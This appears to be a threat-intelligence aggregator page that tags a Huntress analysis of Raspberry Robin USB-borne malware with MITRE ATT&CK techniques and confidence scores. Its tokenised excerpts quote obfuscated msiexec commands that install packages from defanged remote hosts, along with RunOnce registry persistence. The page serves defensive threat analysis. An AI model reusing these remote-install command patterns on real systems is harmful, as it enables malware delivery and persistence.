TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Evolution of USB-Borne Malware, Raspberry Robin | Huntress

2023-09-07 · Read original ↗

ATT&CK techniques detected

11 predictions
T1547.001Registry Run Keys / Startup Folder
100%
“. ] bz : 8080 / aoa3lshnjcafim / hmgkh / 62oyni / < redacted > " enksxm = kdvz vtecb = bhlmevjk - quiet \ twx = iy ldp = vefglpn \ tmcxwt = zttloku finally, persistence is established by creating a value beneath the user ’ s runonce registry key. as microsoft stated : entries in …”
T1218.007Msiexec
99%
“##ju / machine = user " msiexec hbelpyii = tpvbe wywsziubg = mpv / i " http : / / ejk [. ] bz : 8080 / bc / a3y7fxb0odmxkstfqgyd / machine? user " - quiet zs = xkg kvbzhtp = upyzqtff vqtpdg = mwbmsiexec zkrz = ctx / qn wzd = vgaoygd / package " http : / / jrx [. ] fr : 8080 / yky…”
T1091Replication Through Removable Media
98%
“evolution of usb - borne malware, raspberry robin | huntress due to our extensive and diverse customer base, huntress “ sees ” a good bit of the same malicious activity others are seeing, albeit often from a slightly different perspective. one example of this is, not long ago, hu…”
T1059.003Windows Command Shell
93%
“. ico these commands redirect or “ pipe ” the contents of the “ junk ” files into the command processor, denoted by either “ cmd ” or “! comspec! ”. more recently, huntress observed a command line that contained a significant amount of ‘ white space ’ with the command line itself…”
T1091Replication Through Removable Media
81%
“endpoint windows event logs indicates that the usb device in question was connected to the endpoint repeatedly during january 2023, the earliest observed time being on january 6, 2023. each time the device was connected to the endpoint, windows defender detected the file “ d : \ …”
T1091Replication Through Removable Media
78%
“been described as a “ usb worm ”, as usb devices are the primary delivery mechanism that has been observed to this point. users interact with a file on a usb device, and then their system becomes infected with the raspberry robin malware. raspberry robin has been seen to be part …”
T1204.002Malicious File
75%
“/ zjc [. ] bz : 8080. huntress detected the raspberry robin execution pattern. 12 : 23 : 06z windows defender detects downloaded file “ c : \ programdata \ rmbizw \ felgs. evmg ” and submits it to the defender cloud. 12 : 24 : 06z windows defender detects the submitted file as “ …”
T1059.003Windows Command Shell
57%
“the command. for example, as with previous commands in the infection process, the command itself is of mixed case, alternating between upper - and lower - case letters. the domain accessed for the resource is most often three characters long, and the top - level domain is two cha…”
T1518.001Security Software Discovery
55%
“managed edr and managed microsoft defender enables both active defense against threats as they take place and visibility over how these threats appear. as shown in the above example, pivoting from managed av detections can reveal an infection chain, highlighting other touchpoints…”
T1218.007Msiexec
48%
“the command. for example, as with previous commands in the infection process, the command itself is of mixed case, alternating between upper - and lower - case letters. the domain accessed for the resource is most often three characters long, and the top - level domain is two cha…”
T1685Disable or Modify Tools
45%
“managed edr and managed microsoft defender enables both active defense against threats as they take place and visibility over how these threats appear. as shown in the above example, pivoting from managed av detections can reveal an infection chain, highlighting other touchpoints…”

Summary

A deep dive into the USB-borne Raspberry Robin malware and how Huntress Managed EDR and Managed Antivirus can detect and mitigate this threat.